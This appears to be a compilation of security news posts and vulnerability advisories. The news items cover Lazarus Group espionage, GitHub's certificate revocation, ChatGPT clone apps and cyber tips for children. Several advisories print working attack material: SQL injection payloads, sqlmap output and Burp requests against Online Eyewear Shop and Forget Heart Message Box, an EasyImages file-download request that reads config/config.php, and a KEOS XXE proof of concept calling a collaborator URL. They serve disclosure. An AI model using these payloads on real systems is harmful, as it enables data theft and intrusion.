Categories: Personal
Tags: cybersecurity 101

Tags:  online privacy 101

Are you smarter than a five-year-old? When it comes to online security and privacy, you should be.



(Read more...)




The post Cybersecurity and privacy tips you can teach your 5+-year-old appeared first on Malwarebytes Labs.

Everything we teach our kids starts at home—we parents are their first teachers, after all. So, why wait for them to start going to school to start learning about cybersecurity and online privacy?

Though it's hardly news that more and more children are being introduced to mobile computing devices like tablets, smartphones, and laptops at an early age, you may be surprised at _what_ that age is. In 2015, Time featured a study revealing parents handing over such devices to kids as young as six months old. That may be too early an age for teaching a child beyond getting them to sit up, but after nearly a decade, similar trends on age versus technology use have persisted. \[1\]\[2\]\[3\]

As mobile devices have become an indispensable part of a child's life, a big question stands: What is the "appropriate" age to start teaching your little one about their security and privacy when using those devices? 

Well, it depends. If your child can understand (simple?) instructions and do them, you’re good to go. Remember, every child is different.

**5 cybersecurity and privacy tips you can tell your 5+-year-old**

Fostering habits for some simple yet good cybersecurity and privacy best practices early on can go a long way.

**1\. Lock the device.**

When it's time to put away the phone or tablet so your child can do something else like going to the park, remind them to lock it. They can do this by pressing the power button of the device. Of course, this only works if you have Lock Screen enabled on the device.

If your child is 5 years old and up, you can explain to them that locking the phone or tablet stops other people from using it without asking permission.

**2\. Use passwords.**

Of course, in order to lock a device's screen, a password is needed in this case. Not going for a pattern lock is deliberate. At this stage, we're not only seeding the idea of creating strong passwords but also making locking devices the norm (From 2016 to 2018, a reported 28 percent of Americans surveyed failed to use _any_ safeguards to lock their phones).

Don’t be too concerned about length yet, but if you can get your little one to spell out and remember a six to eight-character string—ideally, a word—you're both golden. We started our little one with a three-letter password to open her tablet when she was four, and we plan to triple that length now that she's two years older.

**3\. Keep the device in a safe place.**

Instruct your little one to put away the phone or tablet after they lock it. Make sure you already have a designated place in the house that your child knows about. Also, check that this place is accessible, and if it has doors, they can easily open and close them with minimal effort and supervision.

Under a pillow on the master's bed works, too (just don't forget to remove it before bedtime).

**4\. Ask for permission.**

Your five-year-old may have access to either the Google Play or Apple App stores via the device you're letting them use. Whether you have parental controls set up for these stores or not, wouldn't it be great to hear them ask: "Is this okay to download, mum?" This gives you, the parent or guardian, the opportunity to review the app to see if it's any good for them (Remember, dubious apps can still end up in these stores.).

The same principle should apply when they're watching videos on YouTube.

Every now and again, we see or read about cute or cartoony clips that are not actually for kids' consumption. And believe it or not, some of them were purposefully made to appear inviting to young children. To be safe, a critical eye is needed because, sometimes, even YouTube's AI can get it wrong.

**5\. Share only with relatives and close family friends.**

Kiddo loves having her picture taken. Sometimes, she would ask me to take a snap and send it to her Nana, who is part of an Instagram group.

Thankfully, only family members—and those close to us who're treated as family—are members of that group. We would've been reluctant to share otherwise.

Kiddo doesn't have a single social media account, but we're already instilling in her the value of information related to her and, consequently, _us_. She knows our home address, for example, and she also knows she should only share it with a policeman or policewoman if she's lost.

**Final thoughts**

The computing devices and apps your little one uses are already impacting them in more ways than one. It's essential to steer them in the right direction by getting ourselves involved in their digital lives as early as possible. There is plenty of room for growth.

So, parents and guardians, be patient. Put these points on repeat and expand on them. And, if you're lucky, be thankful that before your child starts school, they already have some of the cybersecurity and privacy basics down.

Good luck!

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Cybersecurity and privacy tips you can teach your 5+-year-old

An OpSec slip from the North Korean threat group helps researchers attribute what was first suspected as a ransomware attack to nation-state espionage.

Security researchers on Feb. 2 reported that they have detected a cyberattack campaign by the North Korean Lazarus Group, targeting medical research and energy organizations for espionage purposes. 

The attribution was made by threat intelligence analysts for WithSecure, which discovered the campaign while running down an incident against a customer it suspected was a ransomware attack. Further investigation — and a key operational security (OpSec) slip-up by the Lazarus crew — helped them uncover evidence that it was actually part of a wider state-sponsored intelligence gathering campaign being directed by North Korea.

"This was initially suspected to be an attempted BianLian ransomware attack," says Sami Ruohonen, senior threat intelligence researcher for WithSecure. "The evidence we collected quickly pointed in a different direction. And as we collected more, we became more confident that the attack was conducted by a group connected to the North Korean government, eventually leading us to confidently conclude it was the Lazarus Group."

**From Ransomware to Cyber Espionage**

The incident that led them to this activity began through an initial compromise and privilege escalation that was achieved through exploitation of known vulnerabilities in an unpatched Zimbra mail server at the end of August. Within a week, the threat actors had exfiltrated many gigabytes of data from the mailboxes on that server. By October, the attacker was moving laterally across the network and using living-off-the-land (LotL) techniques along the way. By November, the compromised assets started beaconing to Cobalt Strike command-and-control (C2) infrastructure, and in that time period, attackers exfiltrated almost 100GB of data from the network. 

The research team dubbed the incident "No Pineapple" for an error message in a backdoor used by the bad guys, that appended <No Pineapple!> when data exceeded segmented byte size.

The researchers say they have a high degree of confidence that the activity squares up with Lazarus group activity based on the malware, TTPs, and a couple of findings that include one key action during the data exfiltration. They discovered an attacker-controlled Web shell that for a short time connected to an IP address belonging to North Korea. The country has fewer than a thousand such addresses, and at first, the researchers wondered if it was a mistake, before confirming it wasn't.

“In spite of that OpSec fail, the actor demonstrated good tradecraft and still managed to perform considered actions on carefully selected endpoints," says Tim West, head of threat intelligence for WithSecure.

As the researchers kept digging into the incident, they were also able to identify additional victims of the attack based on connections to one of the C2 servers controlled by the threat actors, suggesting a much broader effort than originally suspected, in keeping with espionage motives. Other victims included a healthcare research company; a manufacturer of technology used in energy, research, defense, and healthcare verticals; and a chemical engineering department at a leading research university. 

The infrastructure observed by the researchers has been established since last May, with most of the breaches observed taking place in third quarter of 2022. Based on the victimology of the campaign, the analysts believe the threat actor was intentionally targeting the supply chain of the medical research and energy verticals.

**Lazarus Never Stays Down for Long**

Lazarus is a long-running threat group that's widely thought to be run by North Korea's Foreign Intelligence and Reconnaissance Bureau. Threat researchers have pinned activity to the group dating as far back as 2009, with consistent attacks stemming from it over the years since, with only short periods of going to ground in between. 

The motives are both financial — it's an important revenue-generator for the regime — and spy-related. In 2022, numerous reports emerged of advanced attacks from Lazarus that included targeting of Apple's M1 chip, as well as fake job posting scams. A similar attack last April sent malicious files to targets in the chemical sector and IT, also disguised as job offers for highly attractive dream jobs.

Meanwhile, last week the FBI confirmed that Lazarus Group threat actors were responsible for the theft last June of $100 million of virtual currency from the cross-chain communication system from the blockchain firm Harmony, called Horizon Bridge. The FBI's investigators report that the group used the Railgun privacy protocol earlier in January to launder more than $60 million worth of Ethereum stolen in the Horizon Bridge heist. Authorities say they were able to freeze "a portion of these funds."

Lazarus Group Rises Again, to Gather Intelligence on Energy, Healthcare Firms

Online Eyewear Shop version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Eyewear Shop 1.0 - Product detail 'id' SQL Injection (Unauthenticated)# Date: 2023-01-02# Exploit Author: Muhammad Navaid Zafar Ansari# Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip# Version: 1.0# Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian)# CVE: Not Assigned Yet# References: -------------------------------------------------------------------------------------1. Description:----------------------Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?'  Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.2. Proof of Concept:----------------------Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection.Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysqlSQLMap Response:[*] starting @ 04:49:58 /2023-02-01/[04:49:58] [INFO] testing connection to the target URLyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] nsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK---[04:50:00] [INFO] testing MySQL[04:50:00] [INFO] confirming MySQL[04:50:00] [INFO] the back-end DBMS is MySQLweb server operating system: Linux Debianweb application technology: Apache 2.4.55, PHPback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)3. Example payload:----------------------(boolean-based)' AND 1=1 AND 'test'='test4. Burpsuite request:----------------------GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujipConnection: close

Online Eyewear Shop 1.0 SQL Injection

Companies need to keep security priorities top of mind during economic downturns so all-important revenue generation doesn't come with a heaping side order of security problems.

In today's digital world, there's no question that security must be a constant priority for companies — whether it's protecting internal corporate information or their products and solutions.

However, when recessionary forces are lurking, security for products and solutions that are offered or sold to end users, such as Web or mobile applications, needs to become an even greater focus. While it might seem counterintuitive in a climate of cost-cutting to spend on security — essentially looked at as a checklist item — the alternative is a world of pain and more costs.

According to Accenture, cyberattacks grew by 31% between 2020 and 2021. This was right as the US was grappling with the COVID-19 pandemic and the negative impact it had on the nation's economy. Now, signs may be pointing to another downturn in the economy this year, something reflected by recent layoffs in the industry.

As a result of these economic factors, the reduction in staff and budgets can create the perfect window for cybercriminals to take advantage while companies focus on continuing to operate and sustain themselves.

**A Window of Opportunity for Cybercriminals**

During down economic periods, companies place a greater focus on generating top-line revenue and allot more staff and resources to accomplish it. This means that, in 2023, companies will prioritize the enhancement of applications by creating new features and functionalities that can drive sales.

Unfortunately, with the majority of staff and resources allocated to application enhancement, security can often fall by the wayside. Particularly, keeping everything updated with the latest security practices.

This deprioritization creates a window of opportunity for cybercriminals to take advantage of flaws or bugs in applications. For example, the Synopsys Cybersecurity Research Center (CyRC) recently highlighted a number of vulnerabilities in a few applications available through various app stores. The CyRC stated that it "uncovered weak or missing authentication mechanisms, missing authorization, and insecure communication vulnerabilities" in the apps Lazy Mouse, Telepad, and PC Keyboard. These vulnerabilities could lead to the gathering of sensitive information, such as login credentials, through the exploitation of keystrokes.

Although we don't know the full impact of these vulnerabilities, these are great examples of the types of flaws or bugs that could fall off the list of priorities for many companies.

**Application Security Is Nonnegotiable**

With any scenario in which an application can be compromised by cybercriminals, there's enormous potential for reputational damage and revenue generation. That's why it's nonnegotiable.

Regardless of whether we're in a recessionary period or not, companies must continue prioritizing all application security activities on the same level as revenue. These activities include:

*   **Vulnerability and penetration testing:** Some of the first security activities that are often deprioritized in times of economic downturn are vulnerability and penetration testing. While a company may conduct this testing every few months during a normal economic period, it may decrease that rate to focus IT and engineering staff efforts on building new features and functionalities. This means there's opportunity for cybercriminals to attack an application that's not kept up to date to determine where its security vulnerabilities lie. It's critical for companies to maintain or increase their testing windows during down economic periods as cyber activities tend to trend up.

*   **Risk assessments:** When developing or enhancing applications, there are often company-created custom features and functionalities as well as those they integrated through a third party. Features and functionalities like this can include payments (Apple Pay, Google Pay, Stripe, PayPal, etc.), access (Facebook or Google login, etc.), biometrics, and more. As with vulnerability and penetration testing, companies must conduct regular risk assessments that include any third-party additions with which they work or integrate. The vulnerabilities inherent to these third parties have the potential to become issues for their business, too.

*   **Privacy protection:** Applications, especially those that are geared toward consumers as the end users, are particularly vulnerable to cyberattacks. Companies must continue to implement the processes and protocols that ensure the safety and encryption of user information.

*   **Bug bounty programs:** Historically, many technology companies or companies that offer applications and software host bug bounty programs that help to identify bugs or flaws. It's important for companies to continue investing in these types of programs that offer compensation to developers for their detections because, as mentioned earlier, flaws and bugs open a window for cybercriminals to exploit applications.

**Keep Priorities in Sight**

As companies look ahead and the economy continues to change, it's important they don't lose sight of their priorities. Yes, it's important to continue to find new revenue streams through applications to keep companies profitable. However, that doesn't have to come at the expense of application security.

Application Security Must Be Nonnegotiable

Categories: News
Tags: GitHub

Tags:  Atom

Tags:  Desktop for Mac

Tags:  Apple Developer ID

Tags:  certificates

Tags:  Digicert

Tags:  sunset

After an unauthorized access incident, GitHub will revoke three certificates which will affect users of Atom and GitHub Desktop for Mac.



(Read more...)




The post GitHub revokes several certificates after unauthorized access appeared first on Malwarebytes Labs.

Posted: February 1, 2023 by

In a call to action, GitHub warned users of GitHub Desktop for Mac and Atom that it will revoke certificates which were exposed during unauthorized access to a set of repositories used in the planning and development of GitHub Desktop and Atom. Revoking these certificates will invalidate some versions of GitHub Desktop for Mac and Atom.

**Mitigation**

Users of GitHub Desktop for Mac and Atom will need to take action before February 2, 2023. There will be no impact to GitHub Desktop for Windows.

The affected versions of Atom are 1.63.0 and 1.63.1. To keep using Atom, users will need to download a previous Atom version. There is and will be no newer version, since Atom has not had significant feature development for the past years and sunset was announced for December 15, 2022.

Affected versions of GitHub Desktop for Mac are 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.1.0, 3.1.1, and 3.1.2. Users of these versions are asked to update to the latest version of Desktop.

**Certificates**

Certificates are used to verify the author of the software or code. By revoking a certificate it can no longer be used to sign new code. Revoking these certificates does not put existing installations of the Desktop and Atom apps at risk.

Even though the certificates were password-protected and there has been no evidence of malicious use, GitHub does not want to take the risk of a threat actor signing unofficial applications with these certificates and pretend that they were officially created by GitHub.

To prevent that from happening, GitHub will revoke three specific certificates—two Digicert code signing certificates used for Windows and one Apple Developer ID certificate. The Digicert certificates had a short lifespan left and as a result they would have been unusable to sign code after February 2, 2023 anyway. The Apple Developer ID certificate is valid until 2027.

**Why?**

On December 7, 2022, GitHub detected unauthorized access to a set of repositories used in the planning and development of GitHub Desktop and Atom. After investigation, no unauthorized changes were found, but a set of encrypted code signing certificates were exfiltrated. During the unauthorized access which took place on December 6, 2022, repositories from the Atom, Desktop, and other deprecated GitHub-owned organizations were cloned by a compromised Personal Access Token (PAT) associated with a machine account.

**GitHub actions**

Besides a thorough investigation and revoking the three certificates, GitHub has removed the two affected versions of the Atom app (1.63.0-1.63.1) from the releases page. They are also working with Apple to monitor for any new executable files (like applications) signed with the exposed Apple Developer ID certificate until said certificate is revoked on February 2.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

GitHub revokes several certificates after unauthorized access

Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.

**Forget Heart Message Box 1.1 has multiple SQL injections****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

1.1

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.43

**Vulnerability Description AND recurrence:**

Vulnerability Documentation：_adminpost.php_

Parameter: name

POST /admin/loginpost.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://192.168.2.101/
Cookie: PHPSESSID=28s17sili7ldmc68goe212s593
Content-Length: 29
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: 192.168.2.101
Connection: Keep-alive

login=&name=1232\*&pass=123456

  

Vulnerability Documentation：_cha.php_

Parameter: name

POST /cha.php HTTP/1.1
Host: 192.168.2.24
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.24
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.24/cha.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qhndee8uhjmf0g0nrul6nmcurs
Connection: close

name=1\*&go=%E6%9F%A5%E8%AF%A2%E7%95%99%E8%A8%80

**Restoration suggestions**

Filtering of user input or using magic methods.

CVE-2023-24956: Forget Heart Message Box 1.1 has multiple SQL injections · Issue #1 · Mortalwangxin/lives

Easy Images v2.0 was discovered to contain an arbitrary file download vulnerability via the component /application/down.php. This vulnerability is exploited via a crafted GET request.

**EasyImages2.0-arbitrary-file-download-vulnerability****Found on: 2022-12-27****Impact version**

EasyImages2.0 ≤ v2.6.7

**Analysis Report：**

_Vulnerability path: /application/down.php_

payload：

GET /application/down.php?dw=config/config.php HTTP/1.1
Host: 192.168.2.13
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm\_lvt\_c790ac2bdc2f385757ecd0183206108d=1672116632; Hm\_lpvt\_c790ac2bdc2f385757ecd0183206108d=1672149755
Connection: close

You can download any file in the host by passing the dw parameter to the get request

**Fixes**

Specify the download directory to download only for the specified directory, other directories are filtered and requests are rejected.

CVE-2022-48161: GitHub - sunset-move/EasyImages2.0-arbitrary-file-download-vulnerability: EasyImages2.0 arbitrary file download vulnerability

Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).

**Exploit Title: CVE-2022-47873 KEOS Software XXE****Exploit Author: Ömer Akincir****Team: Ömer Yılmaz****Version: 1.0 >=****Vuln Details: XXE****Description:**

KEOS application running on the web is vulnerable to XML External Entity (XXE) attack.

**Impact:**

An attacker can trigger SSRF over XXE using Proof Of Concept.

**PoC:**

    POST /KEOS/ HTTP/1.1
    Host:
    Content-Type: application/xml
    Soapaction: ""
    Content-Length: 160
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
    
    <?xml version="1.0" encoding="utf-8"?>
    
      <!DOCTYPE roottag PUBLIC "-//A//B//EN" "http://BURP-COLLOBRATOR-URL">
    
      <roottag>test</roottag>
    

Ref: https://github.com/waspthebughunter/CVE-2022-47873

CVE-2022-47873: CVE-2022-47873 KEOS Software XXE - Fordefence - Adli Bilişim Laboratuvarı

By Waqas
Several fake ChatGPT clone apps have surfaced on the official iOS and Play Stores, collecting user data and sending it to remote servers.
This is a post from HackRead.com Read the original post: ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

On Android devices, one of the apps analyzed by researchers has more than 100,000 downloads, tracks, and shares location data with ByteDance and Amazon, etc.

ChatGPT, the AI software, has already taken the Internet by storm, and that is why cybercriminals are looking to exploit the opportunity for malicious purposes. But the bigger question is, does ChatGPT have official apps for iOS or Play Store? Short answer: No, but we asked ChatGPT about it.

For your information, Chat Generative Pre-Trained Transformer, aka **ChatGPT**, is a chatbot launched in November 2022 by OpenAI. It is part of OpenAI’s GPT-3 family of language models and is compatible with both reinforcement and supervised learning techniques.

According to Top10VPN, unofficial clones and fake apps of the ChatGPT chatbot are available on both the Apple App Store and Google Play Store when they search for the term “ChatGPT.”

The researchers analyzed the ten highest-ranking apps, most of which relied on the new ChatGPT-3 technology. They used open-source tools, such as **mitmproxy**, to examine network traffic in their testing environment and detect risky functionalities in the Android apps’ code.

Moreover, they also analyzed the clone apps’ privacy policies and store pages to understand each app’s data collection and sharing policies.

**_MORE Chatgpt NEWS_**

1.  **OpenAI’s ChatGPT Can Create Polymorphic Malware**
2.  **Hackers Want to abuse ChatGPT by Bypass Restrictions**
3.  **Hackers Exploiting OpenAI’s ChatGPT to Deploy Malware**

**Collecting Android Data**

On Android devices, two clone apps collect/share users’ IP addresses with 3rd parties, whereas one app, identified as ChatGPT AI Writing Assistant with more than 100,000 downloads, tracks/shares location data with ByteDance and Amazon, etc.

Three of these apps ask for permissions that compromise users’ privacy, including recording audio permission, even though in-app speech functions are unavailable.

Moreover, all clone apps feature code with privacy impacts and lack the relevant permissions, including access to location, camera, photos, videos, and read/write storage.

Furthermore, nine apps exploit OpenAI’s GPT-3 technology, which is currently free, and three apps charge for access. One of the apps offers an ad-free tier. The list of malicious Android apps shared by Top10VPN includes the following:

*   AI Chat Companion
*   ChatGPT 3: Chat GPT AI
*   Open AI Chat Gpt – AI 360
*   TalkGPT – Talk to ChatGPT
*   Open Chat – AI Chatbot App
*   ChatGPT AI Writing Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**Collecting iOS data**

On iOS devices, the ten top-ranked clone apps collected shared data with inadequate privacy protections. Two apps logged Q&A content, and five allowed third-party trackers to fingerprint devices.

An app called Alfred – Chat with GPT 3 involved in collecting device info (Top10VPN)

According to Top10VPN’s **report**, more than 300 server requests were launched within four minutes by one app. Seven apps did not follow the data collection practices according to their official privacy labels. Nine apps exploited OpenAI’s GPT-3 technology, and eight apps charged up to $15,000 per year for access.

The list of malicious iOS apps shared by Top10VPN includes the following:

*   Open Chat – AI Chatbot
*   Alfred – Chat with GPT 3
*   Genie – GPT AI Assistant
*   TalkGPT – Talk to ChatGPT
*   Chat AI: Personal AI Assistant
*   Write For Me GPT AI Assistant
*   Wisdom Ai – Your AI Assistant

The full list with in-depth details of how and which data these apps collect is **available here**.

**How do These Apps Threaten User Privacy?**

All the top-ten ChatGPT apps in the **Google Play Store** collected shared data with poor privacy protections. The apps shared numerous data points about user devices, such as screen size or network operator.

This may appear harmless on its own, but it can be used for fingerprint devices. Though none of these apps have malicious tendencies, one app was found to be sharing data with ByteDance.

Similarly, many apps are charging the user to access an available free app, which raises ethical concerns. Regarding user data privacy, TalkGPT was the most offensive of all apps, as it tracks users’ precise location data and transfers it to ByteDance, Amazon, Appodeal, AdTech, and InMobi.

It also seeks permission to record audio and collects users’ IP addresses and device fingerprints, which it shares with five third parties, including AdColony, Facebook, Criteo, Everest Technologies, and Google.

In addition, many clone apps mine the personal data of ChatGPT’s userbase, which had exceeded one million users in less than a week of its launch.

1.  **Avast anti-virus acknowledges collecting user data**
2.  **Data Collection Costs Epic Games Half a Billion USD**
3.  **Top 10 Android Ed Apps That Collect Most User Data**
4.  **Android sends more data to Google than iOS to Apple**
5.  **How data collected in gaming can breach user privacy**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store

GitHub on Monday disclosed that unknown threat actors managed to exfiltrate encrypted code signing certificates pertaining to some versions of GitHub Desktop for Mac and Atom apps.
As a result, the company is taking the step of revoking the exposed certificates out of abundance of caution. The following versions of GitHub Desktop for Mac have been invalidated: 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6,

Security Incident / Encryption

GitHub on Monday disclosed that unknown threat actors managed to exfiltrate encrypted code signing certificates pertaining to some versions of GitHub Desktop for Mac and Atom apps.

As a result, the company is taking the step of revoking the exposed certificates out of abundance of caution. The following versions of GitHub Desktop for Mac have been invalidated: 3.0.2, 3.0.3, 3.0.4, 3.0.5, 3.0.6, 3.0.7, 3.0.8, 3.1.0, 3.1.1, and 3.1.2.

Versions 1.63.0 and 1.63.1 of 1.63.0 of Atom are also expected to stop working as of February 2, 2023, requiring that users downgrade to a previous version (1.60.0) of Atom. GitHub Desktop for Windows is not affected.

The Microsoft-owned subsidiary said it detected unauthorized access to a set of deprecated repositories used in the planning and development of GitHub Desktop and Atom on December 7, 2022.

The repositories are said to have been cloned a day before by a compromised personal access token (PAT) associated with a machine account. None of the repositories contained customer data, and the compromised credentials have since been revoked. GitHub did not disclose how the token was breached.

"Several encrypted code signing certificates were stored in these repositories for use via Actions in our GitHub Desktop and Atom release workflows," GitHub's Alexis Wales said. "We have no evidence that the threat actor was able to decrypt or use these certificates."

It's worth pointing out that a successful decryption of the certificates could permit an adversary to sign trojanized applications with these certificates and pass them off as originating from GitHub.

The three compromised certificates – two Digicert code signing certificates used for Windows and one Apple Developer ID certificate – are set for revocation on February 2, 2023.

The code hosting platform also said it released a new version of the Desktop app on January 4, 2023, that's signed with new certificates that were not exposed to the threat actor. It further emphasized that no unauthorized changes were made to the code in these repositories.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#apple